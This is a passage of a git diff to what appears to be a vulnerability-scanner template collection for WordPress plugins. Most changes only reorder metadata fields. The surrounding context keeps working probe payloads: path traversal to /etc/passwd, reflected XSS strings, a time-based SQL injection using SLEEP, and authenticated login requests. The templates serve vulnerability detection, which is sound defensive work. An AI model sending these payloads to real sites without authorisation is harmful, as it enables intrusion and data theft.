CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wpscan metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,wpscan http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/wordpress/churchope-lfi.yaml b/http/vulnerabilities/wordpress/churchope-lfi.yaml index aaaae582a7..0006aa2533 100644 --- a/http/vulnerabilities/wordpress/churchope-lfi.yaml +++ b/http/vulnerabilities/wordpress/churchope-lfi.yaml @@ -9,9 +9,9 @@ info: - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 classification: cwe-id: CWE-22 - tags: wp,wpscan,wordpress,wp-theme,lfi metadata: max-request: 1 + tags: wp,wpscan,wordpress,wp-theme,lfi http: - method: GET diff --git a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml index a93c8ff797..5c95fd22a3 100644 --- a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml +++ b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin metadata: max-request: 2 + tags: xss,wp,wordpress,authenticated,clearfy-cache,wpscan,wp-plugin http: - raw: @@ -31,6 +31,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml index 78d8998c41..64d642bd9e 100644 --- a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml +++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml @@ -6,15 +6,14 @@ info: severity: critical description: | The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + remediation: Fixed in version 1.6.3 reference: - https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243 - https://wordpress.org/plugins/photo-gallery/ - remediation: Fixed in version 1.6.3 metadata: - max-request: 1 verified: true + max-request: 1 tags: sqli,wpscan,wordpress,contus-video-gallery,unauth - variables: num: '999999999' diff --git a/http/vulnerabilities/wordpress/curcy-xss.yaml b/http/vulnerabilities/wordpress/curcy-xss.yaml index 4b9a7687c6..415ed8ff6a 100644 --- a/http/vulnerabilities/wordpress/curcy-xss.yaml +++ b/http/vulnerabilities/wordpress/curcy-xss.yaml @@ -8,13 +8,13 @@ info: reference: - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37 - https://wordpress.org/plugins/woo-multi-currency - metadata: - max-request: 2 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan http: @@ -32,6 +32,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml index a6d6523572..5759b9387b 100644 --- a/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -11,9 +11,9 @@ info: - https://woocommerce.com/?aff=1790 classification: cwe-id: CWE-98 - tags: packetstorm,wordpress,wp-theme,lfi metadata: max-request: 1 + tags: packetstorm,wordpress,wp-theme,lfi http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml b/http/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml index 3f31aa388e..2e592c1d74 100644 --- a/http/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml +++ b/http/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the dzs-zoomsounds plugin. - tags: wordpress,listing,wp-plugin,wp metadata: max-request: 1 + tags: wordpress,listing,wp-plugin,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml b/http/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml index f9f573309d..ba46896886 100644 --- a/http/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml +++ b/http/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml @@ -6,9 +6,9 @@ info: severity: info description: Searches for sensitive directories present in the easy-media-gallery-pro plugin. reference: https://www.exploit-db.com/ghdb/6455 - tags: wordpress,listing,wp-plugin metadata: max-request: 1 + tags: wordpress,listing,wp-plugin http: - method: GET @@ -22,6 +22,7 @@ http: - "Index of" - "wp-content/plugins/easy-media-gallery-pro/" condition: and + - type: status status: - 200 diff --git a/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index 433da6e27f..5712141d46 100644 --- a/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: wordpress,wp-theme,redirect,wp metadata: max-request: 1 + tags: wordpress,wp-theme,redirect,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml index e0793969af..0bbb0a2f64 100644 --- a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml +++ b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml @@ -4,17 +4,16 @@ info: name: WordPress WooCommerce Google Shopping < 1.2.4 - Cross-Site Scripting author: dhiyaneshDk severity: high - description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and - executing it in a logged in admin context. + description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and executing it in a logged in admin context. reference: - https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wp-plugin,xss,authenticated,woocommerce,wpscan,wordpress metadata: max-request: 2 + tags: wp-plugin,xss,authenticated,woocommerce,wpscan,wordpress http: - raw: @@ -31,6 +30,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index cb2497ee93..3de2f07da7 100644 --- a/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: xss,wordpress,wpscan metadata: max-request: 1 + tags: xss,wordpress,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/hb-audio-lfi.yaml b/http/vulnerabilities/wordpress/hb-audio-lfi.yaml index 3f1ea5fef0..eb5cc37a7a 100644 --- a/http/vulnerabilities/wordpress/hb-audio-lfi.yaml +++ b/http/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -7,13 +7,13 @@ info: description: Wordpress HB Audio Gallery Lite is vulnerable to local file inclusion. reference: - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html - metadata: - max-request: 1 - google-query: inurl:/wp-content/plugins/hb-audio-gallery-lite classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + max-request: 1 + google-query: inurl:/wp-content/plugins/hb-audio-gallery-lite tags: wp,packetstorm,wordpress,wp-plugin,lfi http: diff --git a/http/vulnerabilities/wordpress/health-check-lfi.yaml b/http/vulnerabilities/wordpress/health-check-lfi.yaml index 8205edc084..5a6a33ad7a 100644 --- a/http/vulnerabilities/wordpress/health-check-lfi.yaml +++ b/http/vulnerabilities/wordpress/health-check-lfi.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan metadata: max-request: 2 + tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan http: - raw: @@ -34,6 +34,7 @@ http: action=health-check-view-file-diff&file=../../../../../../etc/passwd cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml b/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml index 688c2dde65..00dc074d90 100644 --- a/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml +++ b/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml @@ -5,16 +5,16 @@ info: author: dhiyaneshDK severity: high description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. + remediation: Upgrade to version 1.4 or later. reference: - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - remediation: Upgrade to version 1.4 or later. - tags: wordpress,wp-plugin,lfi,wp metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml index c78c2d8544..62ca979328 100644 --- a/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: wp-plugin,wordpress,lfi,rfi metadata: max-request: 1 + tags: wp-plugin,wordpress,lfi,rfi http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml index 9ccfbce40f..c3bd18453a 100644 --- a/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml +++ b/http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml @@ -10,8 +10,8 @@ info: reference: - https://wpscan.com/vulnerability/1dc2cec8-e3dd-414b-8ccb-d73d51b051ee metadata: - max-request: 2 verified: true + max-request: 2 tags: xss,wp-plugin,wordpress,wp,ldap-wp-login-integration-with-active-directory,wpscan http: @@ -22,7 +22,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=LDAP+authentication+intergrating+with+AD&a"> HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml index 1be0243294..6eddbb0ad1 100644 --- a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -10,9 +10,9 @@ info: - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3 - https://wordpress.org/plugins/leaguemanager/ metadata: - max-request: 1 verified: true - tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth + max-request: 1 + tags: wpscan,sqli,wp,wp-plugin,wordpress,leaguemanager,unauth http: - raw: diff --git a/http/vulnerabilities/wordpress/members-list-xss.yaml b/http/vulnerabilities/wordpress/members-list-xss.yaml index 29ddfcc9f2..89be7d299d 100644 --- a/http/vulnerabilities/wordpress/members-list-xss.yaml +++ b/http/vulnerabilities/wordpress/members-list-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wp,wordpress,wp-plugin,xss,wpscan metadata: max-request: 1 + tags: wp,wordpress,wp-plugin,xss,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml index 6a12bb3355..ee7e871518 100644 --- a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml @@ -8,13 +8,13 @@ info: reference: - https://wpscan.com/vulnerability/ee248078-89ee-4cc0-b0fe-e932cd00db3e - https://wordpress.org/plugins/modula-best-grid-gallery - metadata: - max-request: 2 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress http: @@ -32,6 +32,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml index f4e0063010..7f668b23b8 100644 --- a/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml +++ b/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme metadata: max-request: 1 + tags: wpscan,packetstorm,wordpress,wp-theme,lfi,mtheme http: - method: GET diff --git a/http/vulnerabilities/wordpress/music-store-open-redirect.yaml b/http/vulnerabilities/wordpress/music-store-open-redirect.yaml index 721bfd9ce5..81ca8dcc79 100644 --- a/http/vulnerabilities/wordpress/music-store-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/music-store-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: musicstore,wp,wpscan,seclists,wordpress,redirect,wp-plugin metadata: max-request: 1 + tags: musicstore,wp,wpscan,seclists,wordpress,redirect,wp-plugin http: - raw: diff --git a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml index 7bc79c1598..88fb6890e7 100644 --- a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml +++ b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: wordpress,wp-plugin,xss,authenticated,wpscan metadata: max-request: 2 + tags: wordpress,wp-plugin,xss,authenticated,wpscan http: - raw: @@ -30,6 +30,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index b2a2908b2a..150faf2dd5 100644 --- a/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -9,9 +9,9 @@ info: reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html - https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1 - tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress metadata: max-request: 1 + tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml index 0194b7672b..f81878d308 100644 --- a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml +++ b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -8,13 +8,13 @@ info: reference: - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a - https://wordpress.org/plugins/new-user-approve - metadata: - max-request: 2 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp http: @@ -27,12 +27,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml index 668bd702d1..dab99f8744 100644 --- a/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -4,15 +4,14 @@ info: name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect author: dhiyaneshDk severity: medium - description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the - header() PHP function, leading to an open redirect issue. + description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the header() PHP function, leading to an open redirect issue. reference: - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 classification: cwe-id: CWE-601 - tags: redirect,wp-plugin,newsletter,wp,wpscan,wordpress metadata: max-request: 1 + tags: redirect,wp-plugin,newsletter,wp,wpscan,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml index d3a4408c33..f79fa1848e 100644 --- a/http/vulnerabilities/wordpress/notificationx-sqli.yaml +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -6,21 +6,20 @@ info: severity: high description: | The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks. + remediation: Fixed in version 2.3.12 reference: - https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb - https://wordpress.org/plugins/notificationx/ - remediation: Fixed in version 2.3.12 metadata: - max-request: 2 verified: true - tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection + max-request: 2 + tags: wpscan,sqli,wp,wp-plugin,wordpress,notificationx-sql-injection http: - raw: - | GET /wp-json/ HTTP/1.1 Host: {{Hostname}} - - | @timeout: 10s GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1 diff --git a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml index 7c0843161c..a0a1f4641c 100644 --- a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml @@ -11,10 +11,10 @@ info: - https://wpscan.com/vulnerability/e9f9bfb0-7cb8-4f92-b436-f08442a6c60a - https://wordpress.org/plugins/photo-gallery/advanced/ metadata: - max-request: 2 verified: true + max-request: 2 publicwww-query: "/wp-content/plugins/photo-gallery" - tags: wp,wp-plugin,wordpress,xss,photo-gallery,authenticated + tags: wpscan,wp,wp-plugin,wordpress,xss,photo-gallery,authenticated http: - raw: @@ -24,12 +24,12 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/plugins.php?%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml index 9e427bed05..072c2ccfa1 100644 --- a/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml @@ -10,9 +10,9 @@ info: - https://wordpress.org/plugins/pie-register/ classification: cwe-id: CWE-601 - tags: redirect,wp-plugin,pieregister,wpscan,wordpress metadata: max-request: 1 + tags: redirect,wp-plugin,pieregister,wpscan,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/sassy-social-share.yaml b/http/vulnerabilities/wordpress/sassy-social-share.yaml index e266110afc..b925c64bea 100644 --- a/http/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/http/vulnerabilities/wordpress/sassy-social-share.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: xss,wp,wpscan,wordpress,wp-plugin,sassy metadata: max-request: 1 + tags: xss,wp,wpscan,wordpress,wp-plugin,sassy http: - method: GET diff --git a/http/vulnerabilities/wordpress/seatreg-redirect.yaml b/http/vulnerabilities/wordpress/seatreg-redirect.yaml index 5dc5d051a3..f85be19ac5 100644 --- a/http/vulnerabilities/wordpress/seatreg-redirect.yaml +++ b/http/vulnerabilities/wordpress/seatreg-redirect.yaml @@ -9,8 +9,8 @@ info: reference: - https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html metadata: - max-request: 3 verified: true + max-request: 3 tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated http: @@ -21,11 +21,9 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml index a010f5b3aa..c61b5cb883 100644 --- a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wordpress,xss,wp-plugin,authenticated,wpscan metadata: max-request: 3 + tags: wordpress,xss,wp-plugin,authenticated,wpscan http: - raw: @@ -27,7 +27,6 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1 Host: {{Hostname}} @@ -35,12 +34,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E - - | GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/shortcode-lfi.yaml b/http/vulnerabilities/wordpress/shortcode-lfi.yaml index 01ce27ff67..1a52af98e3 100644 --- a/http/vulnerabilities/wordpress/shortcode-lfi.yaml +++ b/http/vulnerabilities/wordpress/shortcode-lfi.yaml @@ -7,13 +7,13 @@ info: description: WordPress Download Shortcode 0.2.3 is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Prior versions may also be affected. reference: - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html - metadata: - max-request: 1 - google-query: inurl:wp/wp-content/force-download.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + max-request: 1 + google-query: inurl:wp/wp-content/force-download.php tags: lfi,shortcode,wp,packetstorm,wordpress,wp-plugin http: diff --git a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml index e762f1d9cc..506e51199f 100644 --- a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml +++ b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml @@ -8,13 +8,13 @@ info: reference: - https://wpscan.com/vulnerability/8a0ddd14-7260-4fb6-bb87-2916aa41ff01 - https://wordpress.org/plugins/shortpixel-image-optimiser - metadata: - max-request: 2 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 tags: shortpixel,authenticated,wpscan,xss,wp-plugin,wp,wordpress http: @@ -32,6 +32,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index d9201c0011..410fca71b6 100644 --- a/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: wp-plugin,redirect,wordpress,wpscan metadata: max-request: 1 + tags: wp-plugin,redirect,wordpress,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml b/http/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml index c14f1ab029..c8fc0a189a 100644 --- a/http/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml +++ b/http/vulnerabilities/wordpress/unauthenticated-duplicator-disclosure.yaml @@ -7,8 +7,8 @@ info: description: | Unauthenticated Information disclosure of Duplicator WordPress plugin sensitive files. metadata: - max-request: 2 verified: true + max-request: 2 tags: wordpress,wp,wp-plugin,misconfig,disclosure,unauth,exposure http: @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/wp-content/backups-dup-lite" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml b/http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml index 4a6e8800dd..8cf4a34c5a 100644 --- a/http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml +++ b/http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml @@ -9,9 +9,9 @@ info: reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html - tags: wordpress,wp-plugin,cache,ssrf,wp metadata: max-request: 1 + tags: wordpress,wp-plugin,cache,ssrf,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/watu-xss.yaml b/http/vulnerabilities/wordpress/watu-xss.yaml index 14830169c2..9493be6b76 100644 --- a/http/vulnerabilities/wordpress/watu-xss.yaml +++ b/http/vulnerabilities/wordpress/watu-xss.yaml @@ -12,8 +12,8 @@ info: - https://wordpress.org/plugins/watu/ - https://plugins.trac.wordpress.org/changeset?reponame=&new=2114019%40watu&old=2112579%40watu& metadata: - max-request: 2 verified: true + max-request: 2 tags: watu,quiz,authenticated,wpscan,xss http: @@ -24,7 +24,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET wp-admin/admin.php?page=watu_question&question=1&action=edit&quiz=1"> HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index 36b6a017b6..8fd5d915dc 100644 --- a/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: 